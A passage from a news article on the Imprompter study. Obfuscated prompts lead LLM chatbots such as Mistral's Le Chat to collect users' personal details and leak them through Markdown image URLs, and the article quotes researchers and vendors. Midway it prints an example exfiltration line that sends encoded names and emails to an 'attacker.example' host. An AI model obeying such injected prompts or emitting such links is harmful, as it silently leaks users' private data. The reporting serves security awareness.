The researchers say that if this attack were carried out in the real world, people could be socially engineered into believing that a prompt they don't understand might do something useful for them, such as improving their résumé. They point to numerous websites that provide prompts people can copy and use. We tested the attack by uploading a résumé into a conversation with the chatbot, and it returned the personal information contained within the file.
Earlence Fernandes, an assistant professor at UC San Diego who worked on the study, says the attack's approach is fairly complicated, as the obfuscated prompt needs to identify personal information, form a working URL, apply Markdown syntax, and do all of this without tipping off the user that it is behaving maliciously. Fernandes likened the attack to malware, citing its ability to perform functions and operate in ways the user did not intend.
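To illustrate the mechanism Fernandes describes: the exfiltration relies on ordinary Markdown image syntax, in which the "image" URL carries the harvested data back to a server the attacker controls. The following line is a minimal sketch of that pattern, with a hypothetical domain and parameter rather than the actual prompt output:

![](https://attacker.example/collect?data=Jane%20Doe%2C%20jane%40example.com)

Because a Markdown renderer fetches the image automatically when the reply is displayed, nothing needs to be clicked for the encoded information to reach the attacker's server, and no meaningful image is ever shown to the user.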
“Typically, you would have to write a lot of computer code to do this with traditional malware,” Fernandes said. “But what I think is great here is that all of that is embodied in this relatively short, nonsensical prompt.”
A Mistral AI spokesperson said the company welcomes security researchers who help make its products safer for users. “In response to this feedback, Mistral AI promptly implemented appropriate remediation to rectify the situation,” the spokesperson said. The company treated the issue as one of “medium severity,” and its fix blocks the Markdown renderer from calling external URLs through this process, meaning external images can no longer be loaded.
Fernandes believes the Mistral AI update is likely one of the first times an adversarial prompt example has led to an LLM product being modified, rather than the attack simply being thwarted by filtering out the prompt. But limiting the capabilities of LLM agents could be “counterproductive” in the long run, he says.
Meanwhile, a statement from ChatGLM’s creators said the company has security measures in place to protect user privacy. “Our models are secure, and we have always prioritized the security and privacy of our models,” the statement said. “By open sourcing our models, we aim to leverage the power of the open source community to better inspect and scrutinize all aspects of the functionality of these models, including security.”
“High-risk activities”
Dan McInerney, head of threat research at security firm Protect AI, says the Imprompter paper releases “an algorithm that automatically creates prompts” that can be used in prompt injection for a variety of exploits, including extracting PII, misclassifying images, and malicious use of tools that the LLM agent can access. Many of the attack types within the study may be similar to previous techniques, McInerney says, but the algorithm ties them together. “This is more along the lines of improving automated LLM attacks rather than an undiscovered threat to them.”
However, he adds that as LLM agents become more commonly used and people give them more authority to take actions on their behalf, the scope for attacks against them will increase. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing before deployment,” McInerney says.
For businesses, that means understanding how AI agents interact with data and how they can be misused. For individuals, alongside standard security advice, it means considering how much information they are handing over to any AI application or company, and, when using prompts found on the internet, being cautious about where they come from.